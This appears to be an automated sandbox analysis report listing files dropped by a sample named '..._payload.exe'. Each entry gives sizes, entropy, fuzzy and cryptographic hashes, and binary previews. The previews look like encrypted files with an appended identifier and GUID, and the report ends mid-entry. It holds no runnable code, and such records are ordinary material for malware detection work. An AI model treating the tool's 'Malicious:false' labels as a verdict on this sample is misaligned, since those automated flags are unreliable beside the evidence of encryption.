                                                                                                Preview:<?xml....%8.O....0.m.!..y%w.$9a..D1...;......l.yVX!.=%....=x.E:D.D..yQ+.....m.#.......uT..6. .W\......j._...k.(..8....[.i.M..gP.n...,a..bY.]......#..Ax..V..\.s......4.KB.Sv..f.....UW...s.W.,..6.zs..e.l2...B.....l.rI.W.H....w..W.o..HV.t.T.....#.].2.k.............c}E....%o.....T..]......./...;A......y.R.C...2..1m..1.fE..C.$.B. .>.9.n`....<..9$.).....%..X..g...Qv......E.....*...^.kk.....yly^...3.k.&....zZ`j<X.Z.pG...3X...t\.l....'.....I."..5.YbJ..0...._p....<......f...".C).Hn....O,.!...^MHx.....&*...j.~..2PF......*.[...8..__.......n.w.g....ub.............q&..1^Wk..*u7..\......c...+|.......z.V...r....-..W...P...Q...|..F.s......4.gY..u...F..|.(..g..t;).}."%.. !.&B4....S.nm...v...U.F{...3......&.<.......@8..~.........*.z.(.5.3[.....`.6..&.t.....,/..q..a...<..p-..e.Fhp.....I..K...4..,&...S.oy...Em#...rD..9....x..M.Z)].P.c..m;......3.>.`.K.A .4.......$..p....m.;r...8,.&...1YXI.q-4..+...&.0..9....]q.....{C...d.+.I.#.U..6.v.6[.*....R.*
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3172
                                                                                                Entropy (8bit):7.947281697634345
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:E0Rj2xrj8OC0owoOoGgPoZIjMQSWf1gLxkkjg8Re+fzlelB6rAqiViB1L7LD:1Kxf89GcoOjMr+1gLOkjgl+fCBA5V
                                                                                                MD5:A799B96DD1755E02616420DF5F67E857
                                                                                                SHA1:F6D714754EFEC109A1811974AFF2048077586086
                                                                                                SHA-256:2D7858736C71E0F3FFE76586A4A05365E7E5D25A17904AF2EC2D57DF46659786
                                                                                                SHA-512:23DCBC1806AE08A644F9E0BD365661D17DA4ADC7C1F1F390E4590586997024E930220F02FB0E4C90B4BDC6EC7D30D3963DCEF699C07083F36B3C374E144843CD
                                                                                                Malicious:false
                                                                                                Preview:<?xml.m..c..p.....\.]z...TM..?.5S.:-jPo:.aZs.6.@..q?\.$..q%..?...^y..$v......|q..[..[.o.z.E...=...h..[..z(.].a(.b.f*..Rj..\U.Uw.)..*fQ...Q..h.v....@{j..r.)..K..0B....{..W.b....a..yt..9...../.v..0.j......)W8....w......H.OG.ma..6...G.;.B...9...... .hzun[E~.yC @..\,.....V%.JL...Y.TU.ai.8...M...........p...SQ.....#.....%s.<.../$.Rr)e........^...u........z..!..@..N..:..k.X.s.-+...u.G....O.<.....!.....E.D.[..n.?..I..+..Xe....?[Ey.sF>:...2...1.........!3d..."..T..Y.o...co.K....}y...\m....p9....lw._o....)......U![.<+$...%Sl$.c..y.2..%wH.;.Z....o&.....23.R....lC....wa..}...a.`.....HY.SU.0..._D,..~.....K...&Z......}.:J..z.7..QF..*....."9.`..^K.....(Ta%DO4....!..?#X.d.t..........l..uw.#.. k'.i...}}j$t`......<........*X.>.RBLg.Ya.p.>.R..[.V.x......+.=V.p.2....(..m.ep.#.#.YO\...+..2........=.../..F.hIc.m. ..y.M..R..1.E......'..g..._.+-..)...!=._.......z.%.......Y[7zD....M..Y....6db..}(,.....;]1BL...v.....b.8..^._H..-........=.u}G.7x..:>F.t..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2096
                                                                                                Entropy (8bit):7.909540906200792
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ZYPXXYh5Faa5z3M4VzkVrzMonCACMqi0LLx0SWjgpO7MinLD:Eo5T3LapzdnCACquO7pn
                                                                                                MD5:0C85A6DD74361B17F182AF0558949CE8
                                                                                                SHA1:77FD558A507A6013A0E0A45588EDC969FAFA5743
                                                                                                SHA-256:478EBC3C12AE327B8A19F83DFA7E0C249335C3F206CD607C5FA3B3377D65D5CD
                                                                                                SHA-512:4BDE07C176D345CB52D711AFFE98CEAC143A0562C8844D8A47309F87BD2503399DAFB89ADC1548F010CBD3962DAACC4F23A71961C7C8B2C2CAE5D21C02743279
                                                                                                Malicious:false
                                                                                                Preview:<?xmlK..c.I........c.+.xR.T...{E<..C...pbbp..:.c.N..+......d.2....w.:~_..I.`.ZhJa.5...D....I..7.>..G.Re....Z^..`JE...%\4"D../....[..5gT...7g....(.P.... "|.Cl...q,D.z.C.Pi..`.f.v../..(..c\n..S8t.Vr|Y.....,t...|.u.XI...x.$2t..dN...8(5B.'.....[..&...>1...8!q..c..;...{..q{?...L........SK.bz:^..(.:.@.x3.{.V...7z.....a.P.r.6%.6.$...BI*....m.$$SD.%.R..*....*)......l...q..M7f+..f....P.).n.*.A..~w..w..r.......j...t-Xd.08.>j{.-GTw[@.=8......@.....".M'.....]........qT|FYf...).N...a...d..3....$.M^.....Q%...n.W..+i...#..I...M..N:#..JP.R.2....fp...[.Q..j....#*Ov4aD....y....W.....eA..0F@b.h4d..K0..\.......M..5F.Va.R.:Z.J;.p....Q...|.8."]..n...-..$..9.7..,.d....z.V...3.\.*..o.A.:....1.....P5..]B..n.e.f..t.qYI;l.Y<...R.`...`A.2[..y.h..........t..+..".9.-...k.V...... ..?...P.]..\.F..].n.S!K..CDD9.. .1..n.(..&..y${u.j..9_..V.h..R..X|.S.XM"..m..#....#.W..F..z..v..........$.......~.M..&..8[C-..Z.....O.q.FZh...G.2...m...xr..H[..w....d...B..&...WXl..M.DR..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):7525
                                                                                                Entropy (8bit):7.973631287136392
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:6LWh92LEDQiy65+JOH1pxl7YwDzCEdwr6g4K3knp:66Ibit3VpxWwnGV4K3knp
                                                                                                MD5:8D16559E9F608026C8B12663D1C0B404
                                                                                                SHA1:D7C25E8076F221CC0515D3DD90C7943D45DE7C29
                                                                                                SHA-256:F7BAD9BFDA89F63D48157AC02081CFF41FA34232D719E92B9D80A7E140248D02
                                                                                                SHA-512:9463816D35ACC7D9372F947BECCA334FFD1F0DDD8EC8CEFF0019C6FB111715E08790AAD9F8F90BDBF2E2EA38C31D14A1B2D3F32C3EF10A9FEA7106C9C4DE03AB
                                                                                                Malicious:false
                                                                                                Preview:<?xml..).. ........o..|....J..giF..v..'R'.s../+....v../......2R'.J...,.....a..W)b.........Q..Q..E.).7}./<F..X..{.*.N.._\..{..yt....K...I...pe.....`..\.f*@..B.]r...U@.\.lZx../.T.[....f..%BM..\......d.;J.1.....W(....I.C.`.U....b..O..hY.@Z`&S.-.TG..lpu..kV.Q..v.t0P.....s..fqUSw a...nj....<.<..LE........rS.I..(.!...i.u.w2.,...RH.R......t...nC.9?"..P......|.Z7.|...vA..D.....P.N......|u..1.'..........u9.Q..{So...V~..j......z.......B.NK.......}A.......a..2g../t..#....6N...x..#ml...]...6.U`.v...p.yV.r..<3;...9B...Gk......oMe=..p5V.}...KU...7.j-.b....V..e.......bdrm..{(`;&.C.\.a.?6.......X5..}...T$-f.{M...a_..c:k.G.{...........".=.N.......m.J...."..F`qR..Q.....o"..^0f.|.....?.n...g.Y.......).p....).T?..mv ..L.hct.,../.+....b;./DD......D3..E..\.-.,..Mim..5RE.Z.#........<..6><+H.`...&-....!.k.U..l......c....j...).....v(r.....2.D...d..Z..cH.....n:.....Zp.;D..7....E]....:..O.f.F?......G.N..(0.9..e...G.<#Vo..B....w'q;.....Q"!........[V..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4197
                                                                                                Entropy (8bit):7.957821139159598
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:tcc0Te57yx0AyeNOk4Ebky7PNGQrNXyZo4BLK6:tccP7yxY4bnl/Ge6
                                                                                                MD5:13A0A68901174D635C45AE91850AB01A
                                                                                                SHA1:8B01984D66197DDA09BF4A539E0B17100D2DEF5F
                                                                                                SHA-256:037B8E20F9ED0B658C75C6C0534F4953C2239AE714CDEA0CA53C6EEE94278DDF
                                                                                                SHA-512:E08CC68C00F34A35337397D563F2163E1822685732B504E3C38BD468ECCC619948185D7432419631276C3190E0B17380FE2B1DE58AC5CDA6FBFC03CB1F04C43B
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....Y)!.}.V.....D......Y@.).......\.b....x..o.........slC.I.P6..f|..B..#`.a.r...Bo...LYF.tBG..i.0\...M.%Cd.u6B......_J"+.$...C..n+9.....).o,Y.b..*...$.%]Tb5Q`..C}.Ab).F.........*^....ar...0.........S..OH..8..~...+...6.N..M....&........2..V.2.A..{...H.Y...O...q0q.!...........;...y....M.*..<.....<%...Rxw.pQ=<..x. .a....]r@...H.A.l.E>.8G......e..ve..I.>).Kw..4$.T.2.z7..P...2..wt.r..[.T\.5.....p...Zc../.G.!:....`.Yf...3.%D.V7W..........j...}M...d..9NZTJ..-zQA.j....>.>*l./.X:..Q.(<r.#.Pi=..V$C5.N".....pGv..........R.....4cQ....G......Mh..k:Nx...'o....r.n...[Q.d..n....*...P..... n.Id...*_.%......Z.:.......!..2...:;A.....cQ..R..N\..9j.'j,..x.~.T...-.%.Z.@X|...9c......<...G.T...2,Z..<T.y.[.]...N.V...W......|..4hu.f.../.V...N5.$D.2.E....1G.ba...*U..).#...<[-z.X....RyA.i...>.....G....L..xhh..q '.]k...`...t..:O(...YS..n.........0..Y..J3.V.t.&.;..u.;.+.6pe*....C.Q...4}...s.s..6!.5._L...p.V.l.?l..G\Sp%q!.Z...H..C..]E..5.o1.....a.Z[./......w.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4608
                                                                                                Entropy (8bit):7.955113506589357
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:X7g2MJaVbPu5BuH5+Zu+T4MkQyeteg1ktIaITKLvTH53q2edAtoBLr3C:0JayuZ4uWFkmhktbTH53QAtoXS
                                                                                                MD5:F40B8687B4A332198719E3DDC0327607
                                                                                                SHA1:A757177D497E378B2DC45993D22362E1ACF203E6
                                                                                                SHA-256:31165E2FFF2C85AE95359E8C8510E792BFBF9916D4ED5253CA4D1AB84C2B1102
                                                                                                SHA-512:1DFD9D2C86C8BE3F4B8938DB2A96AE0FABD631442D1E87E73A97741255448DB3606221323BEFE0EDC15C01A375356A8CB7C2A0F34655D2DE1BA3BB866327A93C
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....m..+.... ....=.B%#.t|}.H).kL.oH`...Ni......z..,.....|QL...= k&.t5..P...u.$......!Sr~..)G..)n.0.?O.n5.6..!........5%..?J.....C.kv._.oy...z,...)..".G.N.k'...-..b....i.. ....C;?(.A7..N]$......!......+..6.$2...F;....H.V.V..C.H:8..\+.0uF..........I.pE..li...fy..L...i.[N].#..MX..R['Nj...mi...%..*..V!..s../....&...X.go....[..q;...k..<hE........b.y.~.q..../..G..&........=.2ipR.AD5.-?.u....Kb.VH....7..uB....dmG....3.&.s7.n.LO71N..#..5.3..'Z.|'...s7..6g2...s.w.T.0.....{.......:...4.c...8...!N.....S...XG.]|......6.=..<....C.,.8...!....u...3.."."4..."\.<.!.o).1>k}...?...a..px.]..j.,.]..&S...4;.ZM...W......>q..@..........[.u..2..l....)...... +M.5.....c.pC.2........K.....K=...4..j^.=/c...%...j...n`'.qMH.,...!.n.G.E].G.5.Dr).<...2.ty.E....!.....6p3...e.M{_...hkiEib5..1....q.Q..[.....F...(..5].......G.Z.u].&.'.=.&.X{5.<(HR$.^h...D.(.j...\..Y...S.75..H..Q;v.`....Cc...j>.O.h.z.u&.L.7X.p.1.k0}t...~~...!........\...r?.gN....17.........Y..}?
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2884
                                                                                                Entropy (8bit):7.936270355952412
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:aoiWe28lKyXCdOqgJNDFQSR1BVAP7xOThNtMWNyFwWvStjC1+O/dEeaNZDLD:a7We5NQ0J1FQ+KPmzUyWvSt2cUEZ
                                                                                                MD5:FC1FC7015FCB3827D9CB9D97E56C86DB
                                                                                                SHA1:B4C16F84ABC4E29F4CA17604D5A2F46FF0767506
                                                                                                SHA-256:86D4A38526C7258D6E80C9FE3BCE8DD9FEA98BFF3A5184566CD083C057C14FE1
                                                                                                SHA-512:3D02315909A43F0271466D90CB707ED4001161DE4509F58CF6D69523146D7DEC460A2DAC628C3F0D221BB097F32903E92DA79F341FDB33BDCEDE79CE4B085F1C
                                                                                                Malicious:false
                                                                                                Preview:<?xmlK.g./..%...t.Uf.9.o..R:.......Ar.R.XL.&G.>...W.S.v.T...$.a..}picJ..$l...[h......#5......b......b]..w..........&@..S.BJ.z8.=.........n.JgX]Sk.....81....jP...u.%m...3T.F......$..u$.czu....c.....O]0.)....R.b3]n....v=.8s.....7...l.P.".-.....&.n...#..p5$2._B....:..H.V0w.i..z5.%.......#En.[y...[.M.).'.'.J...lp...4.4t.....w..!.}.N....q...[.Pc^.........\-....x9.19.o....>H..h`....8S..9..VZ..r...{.._..n.v....F....&.d...I.)....'.Ef..ca...(r..Z.Sn............/.7.f.......5..,.|g..a.p`....~...!ZqF.....H.2q..~..z..D....A..bb.DW.f.@..)<2....w......p..*..c...=`.s.....y....=.......!......8...."s..8:.s.......-CAzI*\e.U...s....giam:...!..b0+.....tv..(..i.>...sx...D.v......Q..J...e....a].....^.o..THV..{..+p.Q.y..........g9..0....e+..q[~a..N.......;..]..O.......VIm<._J%.nvct..B...2..d.j.$iD....v.>..@......rlM-t..13..........\..:.G.H?..?..z`.B..u*...*:.....q..........k....e...;d....>.K.........2-*.%.{.v.7..s.)./4..z.#..{m.........h..Ka...+..n!H..VI..r.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):5842
                                                                                                Entropy (8bit):7.964609661775133
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:786en+bK1cOW3jfgXNk0ExvQSeMfnMSzvpu/WJhtGlpIj5uu6irlICWft1xg9+K:786en51hW3jKEK0nMqvgOgfI9uu68HWI
                                                                                                MD5:D3FD4A91BACCC42006E3FA849F321A8C
                                                                                                SHA1:E0585D59DF4613097CC06587BC20A55688BB3576
                                                                                                SHA-256:AF486F1B07C157150704B451402072BE3301C26D2D4D6D0A291EF597362A8B8E
                                                                                                SHA-512:76D68D1EEED504518B68C8827CA4FC411B0015077F77092055D7B6D959F38DFD0216815B265D3B8D641E0055509B3B7B36BA9F05831A1DC469AE6902DD11CB1D
                                                                                                Malicious:false
                                                                                                Preview:<?xml....A..'w.o.Hp...S...........xp.....l..K.....<.W..02.....2.]....../x......a@....;.5...+...=M6...a..O.0 3.!.p|.G....;kY........Z^...,H....e...^.K~-....y....}..'.;.EC/......^..x.h.6.b!.....].....<.....s..%..>.v...C.....e.G"l."......L.8.s.Tz..c..?~.#E%.Sc......=.........q.C-..E'.....I.Lj...s.0..gA<.q9T2..C..s....g,O{.?...O..WY.g..j.iw.bF...!9.....,......g>.y..dU....4./$...N...........;..<...>.F>O....-T...1.......$...`~0`...#.`.c....~..g......+=.. k.9..r..L...m#..^Qa.f....I....[.p&.....*...F.Ff.X,..".y....7.\.B..&...vDm2.I..3..j.B.gO.M...|...-....C....J1...K. K..X`f...RY.....x8u..r..].}..4}.'..L..;.......O.MQC.!.2.w.1.L.1.........%lL..2%...CH..o/.|.#...q..p...>g..?...v..J...8:w.b.M..:o.D.O...t).'m.W...C5.3$.....`.8.J1p#Ps%......>1.2..T[.....[T<.tg.'.cfu.V....P]..]....)..Q8.{..........y..H.l.A..8TU....y.J.k.]0^Xzd:..F-.M.0.8.qU!P.mE.....f..m.)..'.5.........2.|..5r.'.&....1..:<...t.|...\<4.....l.FJ.^.....w...~8Ti..4....s...N.....0.1.c.,-..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2023
                                                                                                Entropy (8bit):7.908713331903298
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:rYfaT7xHqVl+HFuQ35Y87XxPcSHfFes+FAfQy+pOfTK7FphBgu6mLD:cS3pU7TUXxFczFAIbtb6u
                                                                                                MD5:CD81DD31B7822C7CAD2DB432AFE4FD46
                                                                                                SHA1:75D8FC34F28A4F548C33369B4E245CBC4B3CC350
                                                                                                SHA-256:B8193274ECEA1919F502E2BE431A037C0565F66E46C74B4303007D74F1FCD86F
                                                                                                SHA-512:D6AA3F76E38FC1C4CF31F1DFB33553E0EFF2E34F7638B98DF04FDF0A80870ABAE353891E08B2FF409F8052C10E0B0B169DB9AB10F17E68CF85C7B0653333AE91
                                                                                                Malicious:false
                                                                                                Preview:<?xml........1..dx...?..H.....\{........Z1....{.......~....(r...8.@K..`:....h>.2.*u....Z..g|...\....D.1*.t....J....H...ZFI....'d..P...#..i.CIv..#...Zy.....)...B..~./R.......U4...n...>a#...)..O.$3...._h.Sc}...-G.Y^.i.....k..y......o.DD.oH..w4.K. ...h.I(.Sl./..........9`..?....L...}.G..o.:H......`..Q.ot.tP.w[-7.0......w..a..G.4..v.zp..Om#Z....\\e..O|L.....L5.F....!U.$].kcTN1...OB.Q.S...j.....%p..{Hp.>..0DB.3+...y....U.R"...xq.l.z.\.yY L....<.#.h.r.u..LGN..]e.....W...j.....W.......'..,i.E...(.....G>..R;.v75.....)...}.+.`+...EL.-...~i~>.}+....V#.....)..!..M.....Z..h7......n...N..h4...kb.,.l..o.../.......L..R...w..Qz.....4Z5n...V......-.H......=.}mRC.._.g.rX...6GXy.8...Oy.+..L.}.F=A.'.s.<c..).x.H.,.b.I.....e......d...*.........T.y{1......v`..2.O%..." ..R....TF...|.9...."..'.....ej....W0..<(lc.t.....j..'..[.<....Fm..qNx...].1..Z]...S.....9.......-..(D.?A.......{.....MH...A...R$...|...%O9.5.}.W.^..~6."..:...|..xF.?4....Z-.....B.E_..%.........
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1001
                                                                                                Entropy (8bit):7.807934028715352
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:axWrp1bb26zSS/WKae3d44wFGrcKglV7GQve+ZmzKdaeAWn5x3bD:/btzS6haZkFqx/xIgDLD
                                                                                                MD5:7D36206DD2924365BAFAEF6292E75383
                                                                                                SHA1:69D83F4ABA7A672ED189A5E8AE1B8C7E62BFE356
                                                                                                SHA-256:C6087A42EEED0071D1F69C893A27F3B48BC45FCD26A094AC0F8DD8DD99FAEBDE
                                                                                                SHA-512:0DC4D96483FC2CF75159D4553D1FC59E32B9DC254D3D236B3D60119A43E544FC96F84391157D7A906DAAC57DD39458C9F2996119B33AAF32E2112A5AA5BC6D28
                                                                                                Malicious:false
                                                                                                Preview:<?xmlf....wvp:n\.)...v.K......(.b!..[~.+.;.t.O.....>.#..........LT.....B-.|.a.68|8..s>e..h.........1.p...R.......W..C.._........Bh.N...w-..=.f....8...h..I2.y;.s.=.)VX......S.....r[.,.E...[\b.X..f..o.Q;..`-n{B-D......*&.....'W...........G..\...Hu"/.......*..a...........M.vHY.KU............s(P _.SW.u..C.........1....i.qv..M.:.,`}......sl.....R#g.p...c.A.^.....A.|.8D.....FG...:.......<6.0....7...x.0..R....<...Y..=..v..i.2j.qUG@P<..;W9.2~.=..{.4T...lg\.3...R..m..2..9+.[..H...v.`.......Z...Si4....."=.....k.I..(.r.....Pr.8x3..u.|..2?...+.$..L%Z.....x..y..3.B.d..D.h..I..f...%../...<.b........h...o2.O...-..3....z0.$....!......:"......?..'..\...)@....IQO....]z.p..y!...R..I2.DUl..3....F..@$C...i..J....k.d&.W...1.......MS.7...t*..}..SXa....N..?A..7..".}....1.....e.(,dA\..53...6.+.S...1U..B...T..D..Z<].!.....8..>...I.n..r.J.....3..w....G..U`...ZG...?..}..+S..h...QJ_+..^...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2743
                                                                                                Entropy (8bit):7.928794353297872
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:7bKzlyefAaFP9w28mgS0eXrmtDRjesGSFAF72dfo7vF9bvSx9FO37nYdnYDDLD:/gy6pI28mz7aRNGj72porW9E3TNDr
                                                                                                MD5:A4B0C090153A26D74339A3D18BEB9AC9
                                                                                                SHA1:9112A040439893E522A15623C724D82FEB272420
                                                                                                SHA-256:DBC5342E63312E91A024CC99131547785A39E02237F5FAB58E1E49FDE4136FE1
                                                                                                SHA-512:3B688C43D689B4AF90D3DD0B817C5BB6362A9BCE42012F9403856F8CDDE1AACEFC5FE4CF1220B884A6C9E772CB7FF7D2227DD85B03D872BF2496FC41B04C7969
                                                                                                Malicious:false
                                                                                                Preview:<?xmlv.k5.:..V3.....JO.w.P.....rC...%B.jI....c.@qzZ..wd.e...h....3.o..........;..............N.(.n..5u.a.1.h.db..JQ.q.$f.r..d..\Grp..g..`...A....w.AC3....w....E.:5Td...J.....-..n2..K.1.g7.2.t..A.36l.]V..G@\.....";U..i.Z.*5.j....W...........Y....9>7.Y.<v.1...bW...a...R,....Hz,.ES.'A.:.&.yn.2......"..=../...s:"T...K...J....Y.n.yj..v.m..s.z.n.......+b5..........%.SV .TJ.%...@...-.;3.I.P..?.....U.f}o.Y..a>W...dWm...<7%y]....@-@+.&c...m....,H.....k[.z......9..tS....0'.........0&7e..T....KR....i]...9A(......B..S...5.@fb.$.O.M%...`....9_...2....C.)H.$^.L...[......P.$..P?.mJ.'[..B.S@.O..Z\Xa.!Igr..k..#.y.....-.n._....W~..2_<W..L...WX..|.*.|..#Qz..bi/..o.......n.....#T<.!.\}...w.N.|V.................+*.{x.L..7:..R..0\...m<.o.F...~u.B..9%.j...l..N..,.2.$W..6.uhe.a.e+ES<T.{U...I........G..%a_.......U.yXt]. ...A....{..2N!E"...x..Vf..k....f...W...n&...Sz/.a4.......>C.eU].....1..o...<e.%.1...8.Q.......5x.}.@..H....V,5..fD..<...Y..q...n..!.l.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):11063
                                                                                                Entropy (8bit):7.9833182080142
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:w0t1OWBr0a7MMrUUPYMeHJHsEa9rt3vBkKPGtqHqQ4xyBR9PXoqq:wh0/PleHJA95WK+tqHqfEBbg/
                                                                                                MD5:5C337A22C6E79AEB89849C8053B2A754
                                                                                                SHA1:1C52C96EC04118AC8E0BEAE4FE365C638CE6EE52
                                                                                                SHA-256:25BC155C4C0F6A0961F886277303DE730B8AD89087A1E7641D91F0A57D8C1E1C
                                                                                                SHA-512:3825FFC40DA569F64B390BDD21554D848DF56CBB342E1B140697EDC89C48547844BB6110822FD5EA74EA08C2CCD993A7D62489F8F79A62B0C04953FB8AE31E9B
                                                                                                Malicious:false
                                                                                                Preview:<?xml"...1.f3.RJK[UC^V.f..1.f-..=.._._+.....IE...~...d2>...R......7"]p@B>..._..C....2.bx..M..+......9.._t.l.m..P..+....2.,./~..&....?@{...]...'r._.U:)../[\..6.p..K.M.>.2Wf.l...9W...F...qr..-...Y.....1.....0.F..7...q.j'T>............)Q..:..q].|.6YH......R.P...).z.i..V........S+....i{...W".*a.;y].v).P.X..;..,G..e~.A....\.fcgI.:.....xz....'...FqD.a.......I.g{j2".....$;.g.5 .....J..Q.isK.....3..(..F.q.;....5.!b/......5.R.`.....%.o..X..r....L?..B..wE..J+f.....N(+.!.oA.....n:K......](j... .,....|..s.U..$.g.y.........iz.N=...0!.......|......4..~u.:<...FMx.;}`,...;.........K.k..8.R?J...l...2..w......x,..ct}1.Q......o+...ZTV.b...LM.eB....Z*fk.q.!..9.'-....e...c4..*T/.z..Jk.^..z....F..e.....H......_.N...5.b.;.b......(.&..m.3.]..5....f.t.X>.=.L......eJ*?E..^).d..~....2.s[....m3...|..e..4j.K.z.$.^.+.-..Xe$.sP..n.......o.;+..zmb..HU=....,z.9w...7....s...z..2u....4.c.S..*..B....J....1.:....x...}....IO.l............gS.|..1........%.3....F.}..?...n0..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):807
                                                                                                Entropy (8bit):7.7091593501971
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:23nFggp2+Vqytk3XD4E/TA9OK2J5eX9Ajjo1IKqio+/XMZIORvdwVM/H7/xtggJ4:5gpTVy9NWejovqioQTOjw+/xix3bD
                                                                                                MD5:B12EAF4E862AFD9D8393031096BB9941
                                                                                                SHA1:680C4819F6E65808703324F5C821411291F9FF18
                                                                                                SHA-256:0A5DB35041D5C7D7F605B28BA43F86FCBB9A1261044918A4BA1F3CFFAF16C9EA
                                                                                                SHA-512:6D20FB5F3A26B9887CD3D04B2E6A9D520955702052A8E8F4CE0AF90AE5AD6F9EA9312BF9B4E576B38AE3564CF394E258F8B927000CD0C9D28C53602219463689
                                                                                                Malicious:false
                                                                                                Preview:<?xml...q..Bk,..y....e...I.e....T.u.@yUj.;......T..z.Tz.>....Q...&..-1..7m.i.P.;2.K.4].=...I.n..C.`9hy...e:...\Nr{..&.....0.FexS.@l(......./...r..WY,.....@...<^.3WR...M.J..&.iZ|...d...s.eq.j........6.Y.$........S.K...l.....g.:q.Au..E...=.[V......F|.;....6..DD.....!PK..MRu'...'A.N.>..{x`.<.D.8A.....T\O.N....}N.o...tcZu4 ..SY...+../Pej....}............zB.....J.....t..D.oP-..o.X8*\W..b+.Vg....o.b.s..c.DQ.<h.GBU.'...@.=k.V.Nq..0..5l...M..R.sc.4.,*...s4.+.:s....d..WW.....?..?.w.=....P'l.o+.9..O..v..z..4.i.....}.H.S....%s.....)..@...t....J...|..d.&./>!...J.@y.[..,..i...........7....4...K.C..."'^eq.\$...u...ho...1.r..$..U.r@..*...D.g*...M....ky....vR6.JN0..@W..}.@Ds..#y.a..b..*oj...L.Cr.h.$`.x]..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):747
                                                                                                Entropy (8bit):7.705947831024221
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:UjezB2eRPW8Q/Prty+34SlhsC2eOuWb1NfVDKicGq8RL000DgJc3cii9a:tz4eR+Ttb3GC2eOzb1NfVDuGq8V0Dx3X
                                                                                                MD5:67329C50AD82C3D242CCF9C738CDEBD4
                                                                                                SHA1:FD628AA13D5C707FC29CDEAE7FF9B88209D514FB
                                                                                                SHA-256:13226C6AA9EF088CB38220813B1D369C353AE144F56F8A777A3BB0BEE0D2B396
                                                                                                SHA-512:BEF95A94A3C74E59DDC0A486996FEDAC0800E6C40681FC58E5877B5D0694B1BE96F9F2F32E9591C9CC7400EF8C0EF5EF54C7EA57964E065C34C6CCAFCE155063
                                                                                                Malicious:false
                                                                                                Preview:<?xml./...z..G.R.|...Q..J..0.'.,.K.e.X...3z..yr.R...X..g'.1..b....t5.y3.@r.".v1.df..=..vN....%3..3...B..c...MRI...S..wz....7.........O..!FE...n\I..2....'>Pu]Z.C...:k!.d/..g...b...ZuG...v*^Yhx%.yJ....?8_7.....0ry.&f....JG.e...wj....+>`.vS...E.QZo]6.V../..,.'.m..0n>i<b..l....Lh.f.0.....((..F..M8...RM7j.P>....v[B ..q.;....>I>......k.k......X.....m.KK.M.L^...q..r.....Ga.T....v7...(R^.......).;...y.].=.^./[.E^d....u.]S`.......Y]RC.y>iN.R...(..,.\=.......\9....1.]/w.{..u./R.*.....sK.s..*q9.^....\n.....O.....k$.....Rp.t..`.+..x~.4...m{....*K.$'b....(R...{..M...[z.5a........W....c..i..%.A......8..v...c./...S..N!!?cq.BE...V.y...l...pcl...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1786
                                                                                                Entropy (8bit):7.876177434570509
                                                                                                Encrypted:false
